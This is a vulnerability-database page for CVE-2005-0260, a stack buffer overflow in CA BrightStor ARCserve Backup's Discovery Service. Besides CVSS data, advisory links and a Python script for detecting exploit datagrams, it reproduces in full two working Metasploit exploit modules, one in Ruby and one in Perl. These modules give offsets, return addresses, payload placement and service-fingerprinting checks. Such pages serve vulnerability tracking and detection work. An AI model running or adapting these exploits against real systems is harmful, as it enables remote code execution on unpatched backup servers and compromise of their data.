CVE-2005-0260
CVSS 10.0
Published: 2005-05-02 00:00:00
Revised: 2008-09-05 16:45:47

[Original] Stack-based buffer overflow in the Discovery Service for BrightStor ARCserve Backup 11.1 and earlier allows remote attackers to execute arbitrary code via a long packet to UDP port 41524, which is not properly handled in a recvfrom call.


[CNNVD] CA BrightStor ARCserve Backup Remote Buffer Overflow Vulnerability (CNNVD-200505-711)

        Computer Associates BrightStor ARCserve Backup is a cross-platform backup and recovery system. Its Discovery Service contains a buffer overflow; a remote attacker who sends a crafted request can trigger the overflow and may execute arbitrary code with the privileges of the service process.

- CVSS (base score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can result in complete system shutdown]
Access complexity: LOW [no special access conditions are needed to exploit]
Access vector: [--]
Authentication: NONE [no authentication is needed to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0260
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0260
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-711
(official data source) CNNVD

- Other links and resources

http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20050209 Computer Associates BrightStor ARCserve Backup v11 Discovery Service Remote Buffer Overflow Vulnerability
http://supportconnectw.ca.com/public/enews/BrightStor/brigcurrent.asp#news1
(PATCH)  CONFIRM  http://supportconnectw.ca.com/public/enews/BrightStor/brigcurrent.asp#news1
http://xforce.iss.net/xforce/xfdb/19251
(UNKNOWN)  XF  brightstor-discovery-bo(19251)
http://securitytracker.com/id?1013138
(UNKNOWN)  SECTRACK  1013138
http://secunia.com/advisories/14183
(UNKNOWN)  SECUNIA  14183

- Vulnerability information

CA BrightStor ARCserve Backup Remote Buffer Overflow Vulnerability
Critical  Buffer overflow
2005-05-02 00:00:00  2005-10-20 00:00:00
Remote
        Computer Associates BrightStor ARCserve Backup is a cross-platform backup and recovery system. Its Discovery Service contains a buffer overflow; a remote attacker who sends a crafted request can trigger the overflow and may execute arbitrary code with the privileges of the service process.

- Advisories and patches

        No data recorded in this section (a CA patch link is listed above among the other links, tagged PATCH/CONFIRM, and the OSVDB entry below notes that Computer Associates released a patch)

- Vulnerability information (16406)

CA BrightStor Discovery Service Stack Buffer Overflow (EDBID:16406)
windows  remote
2010-05-09  Verified
0  metasploit
##
# $Id: discovery_udp.rb 9263 2010-05-09 17:52:51Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'CA BrightStor Discovery Service Stack Buffer Overflow',
			'Description'    => %q{
					This module exploits a vulnerability in the CA BrightStor
				Discovery Service. This vulnerability occurs when a large
				request is sent to UDP port 41524, triggering a stack buffer
				overflow.
			},
			'Author'         => [ 'hdm', 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9263 $',
			'References'     =>
				[
					[ 'CVE', '2005-0260'],
					[ 'OSVDB', '13613'],
					[ 'BID', '12491'],
					[ 'URL', 'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 2048,
					'BadChars' => "\x00",   # bytes the encoded payload must not contain
					# Move esp well below the payload before it runs, so the
					# decoder stub's own pushes do not overwrite the shellcode
					# (the Perl module below does the same by prepending an
					# explicit "add esp, -3500").
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					[
						'cheyprod.dll 12/12/2003',
						{
							'Platform' => 'win',
							'Ret'      => 0x23808eb0, # call to edi reg
							'Offset'   => 968,
						},
					],
					[
						'cheyprod.dll 07/21/2004',
						{
							'Platform' => 'win',
							'Ret'      => 0x2380a908, # call edi
							'Offset'   => 970,
						},
					],
				],
			'DisclosureDate' => 'Dec 20 2004',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(41524)
			], self.class)
	end

	def check

		# The Discovery Service also listens on TCP/41523. A bare 'META'
		# request gets no reply, while 'hMETA' is answered with the host
		# name; the two responses together are a cheap fingerprint that
		# never touches the vulnerable UDP/41524 handler.

		# The first request should have no reply
		csock = Rex::Socket::Tcp.create(
			'PeerHost'  => datastore['RHOST'],
			'PeerPort'  => 41523,
			'Context'   =>
				{
					'Msf'        => framework,
					'MsfExploit' => self,
				})

		csock.put('META')
		x = csock.get_once(-1, 3)   # wait up to 3 seconds for any reply
		csock.close

		# The second request should be replied with the host name
		csock = Rex::Socket::Tcp.create(
			'PeerHost'  => datastore['RHOST'],
			'PeerPort'  => 41523,
			'Context'   =>
				{
					'Msf'        => framework,
					'MsfExploit' => self,
				})

		csock.put('hMETA')
		y = csock.get_once(-1, 3)
		csock.close

		# Only the combination counts. Note the result is Detected, not
		# Vulnerable: the fingerprint shows the service is present, it says
		# nothing about whether the CA patch has been applied.
		if (y and not x)
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect_udp

		print_status("Trying target #{target.name}...")

		# 4096 bytes of printable filler, far past the fixed-size stack
		# buffer the service reads the datagram into.
		buf = rand_text_english(4096)

		# Stack layout at the time of the crash (measured for target 0):
		#
		# esp @ 971    - esp ends up just past the saved return address
		# ret @ 968    - saved return address, overwritten with the address of
		#                a 'call edi' instruction in cheyprod.dll (a 2003/2004
		#                build loaded at a fixed base, hence the hard-coded Ret)
		# edi @ 1046   - edi points into the buffer here, so 'call edi' lands
		#                on the payload
		# end = 4092

		buf[target['Offset'], 4] = [ target.ret ].pack('V')   # little-endian dword
		buf[1046, payload.encoded.length] = payload.encoded

		udp_sock.put(buf)           # a single datagram is the whole attack
		udp_sock.recvfrom(8192)     # drain any reply; none is expected on success

		handler
		disconnect_udp
	end

end
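The offsets and return addresses in the module above (ret at 968 or 970, payload at 1046, 4096-byte datagram) are just as useful for triage as for exploitation. The following added example, which is not part of the Metasploit module or of any CA code, classifies captured UDP/41524 payloads against that layout. Two things in it are assumptions rather than page facts: the 512-byte bound on a legitimate discovery datagram, and the heuristic that any little-endian dword of the form 0x2380xxxx at a return-address offset is a pointer into cheyprod.dll, which is inferred only from the two published gadget addresses. The sample datagrams are constructed inline and carry a text marker instead of a payload.

```python
import struct

# Exploit layout as published in the Metasploit module above:
# (target name, return address written into the buffer, offset of that dword)
KNOWN_TARGETS = [
    ("cheyprod.dll 12/12/2003", 0x23808EB0, 968),
    ("cheyprod.dll 07/21/2004", 0x2380A908, 970),
]
PAYLOAD_OFFSET = 1046      # payload.encoded is placed here (edi points here at the crash)
EXPLOIT_LENGTH = 4096      # rand_text_english(4096)

# Assumption (not from the page): a legitimate discovery datagram is short.
# Anything larger is flagged as oversized even without a gadget match.
MAX_LEGIT_LEN = 512

# Assumption inferred from the two published addresses: both gadgets live in
# the 0x2380xxxx range, so a dword with that upper half at a return-address
# offset is treated as a pointer into cheyprod.dll.
GADGET_HIGH_WORD = 0x2380
RET_OFFSETS = tuple(off for _, _, off in KNOWN_TARGETS)


def dword_at(data: bytes, offset: int):
    """Little-endian dword at offset, or None if the datagram is too short."""
    if len(data) < offset + 4:
        return None
    return struct.unpack_from("<I", data, offset)[0]


def classify_datagram(data: bytes) -> dict:
    """Triage one UDP payload destined for port 41524."""
    matches = [name for name, ret, off in KNOWN_TARGETS if dword_at(data, off) == ret]
    suspect_pointer = any(
        (dword_at(data, off) or 0) >> 16 == GADGET_HIGH_WORD for off in RET_OFFSETS
    )
    oversized = len(data) > MAX_LEGIT_LEN
    return {
        "len": len(data),
        "oversized": oversized,
        "matches": matches,
        "suspect_pointer": suspect_pointer,
        # An exact gadget match is enough on its own; otherwise require both signals,
        # so a plain oversized datagram (fuzzing, a crash attempt) is reported but not
        # called an exploit.
        "malicious": bool(matches) or (oversized and suspect_pointer),
    }


def build_sample(target_idx: int) -> bytes:
    """Constructed datagram mirroring the module's layout, with a text marker
    where the module would place the encoded payload (no shellcode here)."""
    _, ret, off = KNOWN_TARGETS[target_idx]
    buf = bytearray(b"A" * EXPLOIT_LENGTH)          # module uses rand_text_english
    buf[off:off + 4] = struct.pack("<I", ret)       # same as [ target.ret ].pack('V')
    marker = b"<encoded payload goes here>"
    buf[PAYLOAD_OFFSET:PAYLOAD_OFFSET + len(marker)] = marker
    return bytes(buf)


# Constructed samples: one per published target, a short benign-looking probe,
# and a large datagram with no gadget at all.
SAMPLES = {
    "target0": build_sample(0),
    "target1": build_sample(1),
    "benign": b"META",
    "big_no_gadget": b"A" * EXPLOIT_LENGTH,
}

if __name__ == "__main__":
    for label, pkt in SAMPLES.items():
        v = classify_datagram(pkt)
        print(f"{label:14} len={v['len']:4} oversized={v['oversized']} "
              f"pointer={v['suspect_pointer']} matches={v['matches']} malicious={v['malicious']}")
```

Feed `classify_datagram` the UDP payload (not the whole frame) of each datagram to port 41524; a packet capture filter of `udp dst port 41524` is sufficient. The exact-match list will only ever name the two builds the module ships, so the pointer heuristic is what catches a re-targeted copy of the same exploit.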
		

- Vulnerability information (F83122)

CA BrightStor Discovery Service Overflow (PacketStormID:F83122)
2009-11-26 00:00:00
H D Moore, patrick  metasploit.com
exploit, overflow, udp
CVE-2005-0260

This Metasploit module exploits a vulnerability in the CA BrightStor Discovery Service. This vulnerability occurs when a large request is sent to UDP port 41524, triggering a stack overflow.


- Vulnerability information (F36064)

brightstor.c (PacketStormID:F36064)
2005-02-18 00:00:00
Thor Doomen
exploit, overflow, udp
CVE-2005-0260

The CA BrightStor ARCserve Discovery Service overflow exploit takes advantage of a vulnerability in the CA BrightStor Discovery Service that occurs when a large request is sent to UDP port 41524, triggering a stack overflow.

- Vulnerability information (F36062)

cabrightstor_disco.pm (PacketStormID:F36062)
2005-02-18 00:00:00
Thor Doomen
exploit, overflow, udp, perl
windows, 2k, 32
CVE-2005-0260

The CA BrightStor Discovery Service overflow exploit is a Perl Metasploit Framework module that exploits a vulnerability in the CA BrightStor Discovery Service which occurs when a large request is sent to UDP port 41524, triggering a stack overflow. Targets include Win32, Windows 2000, Windows XP and Windows 2003.

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::cabrightstor_disco;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
  {
	'Name'     => 'CA BrightStor Discovery Service Overflow',
	'Version'  => '$Revision: 1.10 $',
	'Authors'  => [ 'Thor Doomen <syscall [at] hushmail.com>' ],
	'Arch'     => [ 'x86' ],
	'OS'       => [ 'win32', 'win2000', 'winxp', 'win2003' ],
	'Priv'     => 1,
	'AutoOpts' => { 'EXITFUNC' => 'process' },
	
	'UserOpts' => 
	{
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 41524],
	},

	'Payload' => 
	{
		'Space'     => 2048,
		'BadChars'  => "\x00",
		'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",	# add esp, -3500					
		'Keys'		=> ['+ws2ord'],
	},

	'Description'  => Pex::Text::Freeform(qq{
		This module exploits a vulnerability in the CA BrightStor
		Discovery Service. This vulnerability occurs when a large
		request is sent to UDP port 41524, triggering a stack
		overflow.
	}),

	'Refs'    => 
	[
		['BID',	'12491'],
		['CVE',	'2005-0260'],
		['URL',	'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities'] 
	],
	
	'Targets' => 
	[
		['cheyprod.dll 12/12/2003', 0x23808eb0], # call to edi reg
	],
	
	'Keys'    => ['brightstor'],
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Check {
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = 41523;   # TCP side of the Discovery Service, not the UDP/41524 handler

	# Connection #1 should not receive a response
	my $s = Msf::Socket::Tcp->new
	(
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
	);

	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return $self->CheckCode('Connect');
	}

	$s->Send("META");
	my $res = $s->Recv(-1, 1);   # up to 1 second for any reply
	$s->Close;

	if ($res) {
		$self->PrintLine("[*] The discovery returned a strange response: $res");
	}

	# Connection #2 should receive the hostname of the target.
	# $s and $res are reused here; re-declaring them with 'my' only
	# earns a "masks earlier declaration" warning under 'use strict'.
	$s = Msf::Socket::Tcp->new
	(
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
	);

	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return $self->CheckCode('Connect');
	}

	$s->Send("hMETA");
	$res = $s->Recv(-1, 1);
	$s->Close;

	if (! $res) {
		$self->PrintLine("[*] The discovery service did not respond to our query");
		return $self->CheckCode('Generic');
	}

	# 'Detected' only: the service answered, which says nothing about patch level.
	$self->PrintLine("[*] Discovery service active on host: $res");
	return $self->CheckCode('Detected');
}

sub Exploit {
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target = $self->Targets->[$target_idx];

	$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);

	my $s = Msf::Socket::Udp->new
	(
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
	);

	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	# 4096 bytes of filler, far past the fixed-size stack buffer the
	# service reads the datagram into (the Ruby port uses random text).
	my $bang = "X" x 4096;

	# Stack layout at the crash:
	# esp @ 971    - esp ends up just past the saved return address
	# ret @ 968    - saved return address, overwritten with a 'call edi' in cheyprod.dll
	# edi @ 1046   - edi points into the buffer here, so 'call edi' lands on the payload
	# end = 4092

	substr($bang, 968, 4, pack('V', $target->[1]));      # little-endian dword
	substr($bang, 1046, length($shellcode), $shellcode);

	$self->PrintLine("[*] Sending " .length($bang) . " bytes to remote host.");
	$s->Send($bang);          # a single datagram is the whole attack
	$s->Recv(-1, 5);          # drain any reply; none is expected on success

	return;
}

1;
    

- Vulnerability information

13613
CA BrightStor ARCserve Backup Discovery Service Buffer Overflow
Remote / Network Access, Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- Vulnerability description

A remote overflow exists in BrightStor ARCserve Backup. The discovery service fails to properly check buffer boundaries, resulting in a stack overflow. With a specially crafted request, an attacker can cause arbitrary code execution, resulting in a loss of integrity.

- Timeline

2004-12-20 2004-12-11
2005-02-11 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Computer Associates has released a patch to address this vulnerability.

- References

- Credit

Unknown or Incomplete
 

 
